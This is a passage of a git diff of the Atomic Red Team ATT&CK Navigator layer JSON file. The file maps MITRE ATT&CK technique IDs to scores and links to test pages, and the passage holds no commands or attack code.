edcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/
atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/ato
mics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-tea
m/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index e7753f83..9124ae71 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T